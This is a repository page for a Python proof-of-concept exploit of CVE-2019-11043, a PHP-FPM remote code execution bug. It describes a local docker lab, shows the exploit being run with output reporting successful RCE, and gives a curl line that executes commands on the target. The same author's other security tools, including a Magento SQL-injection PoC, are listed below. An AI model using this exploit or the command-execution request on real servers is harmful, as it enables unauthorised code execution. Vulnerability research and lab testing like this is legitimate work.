Top Rating
- Top Contributors
  Discover the Top Open Source contributors by country or by language
- Interviews
  Discover real stories from Open Source developers
Discover

Discover your Favorite Language
Discover the top trending repositories and projects on Github. Explore the latest trends in your preferred languages.

Dart

PowerShell

Swift

OCaml

Rust

Java

Crystal

HTML

More Languages
Awesome

Awesome repositories
Discover the most awesome repositories and projects of your favorite languages. Inspired by the Awesome-* lists trend in GitHub.

Clojure

C++

Racket

MATLAB

Elm

Elixir

PHP

F#

More Languages
By Country

Rankings by Country
Discover the community of talented open source contributors in each country.

🇱🇦 Laos

🇶🇦 Qatar

🇦🇸 American Samoa

🇮🇶 Iraq

🇭🇺 Hungary

🇳🇱 Netherlands

🇻🇪 Venezuela

🇲🇴 Macao

All Countries Compare Countries

theMiddleBlue/CVE-2019-11043

Stars
143
Rank 251,714 (Top 6 %)
Language
Python
Created over 4 years ago
Updated over 4 years ago

theMiddleBlue/CVE-2019-11043

theMiddleBlue

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

(PoC) Python version of CVE-2019-11043 exploit by neex

PoC CVE-2019-11043

A Python version of the CVE-2019-11043 exploit https://github.com/neex/phuip-fpizdam
This PoC is still a draft, please use the exploit written by @neex
Vulnerability Analysis: https://paper.seebug.org/1064/

PoC Setup

Just run docker compose to bring up nginx and php-fpm:

# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

if you wish to read php-fpm logs, you could run:

docker logs --tail 10 --follow php

Exploit

# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

If you want to check the vulnerability only, skipping the exploit:

python3 exploit.py --url http://localhost/index.php --skip-rce
#...
python3 exploit.py --url http://localhost/index.php --reset

You can try to kill php-fpm process and reset all injected PHP settings with --reset:

python3 exploit.py --url http://localhost/index.php --reset

Video PoC

https://twitter.com/Menin_TheMiddle/status/1188776386569355265

DNSenum

Bash script for DNS Enumeration.

nmap-elasticsearch-nse

Nmap NSE script for enumerate indices, plugins and cluster nodes on an elasticsearch target

modsecurity-to-elasticsearch

Very simple and primitive Python script that sends ModSecurity JSON Audit Logs to Elasticsearch

ReputationIP

set of bash scripts to get a list of bad reputation IP addresses

myLittlePuny

Python script that checks for IDN homograph on a given domain name

challenge-bypass-input-validation

Bypass strict input validation to exploit RCE

OWASP-CRS-PoC

Tool that helps creating PoC for testing new CRS rule and rule-set

poc-magento227-sqli

PoC SQLi on Magento 2.2.7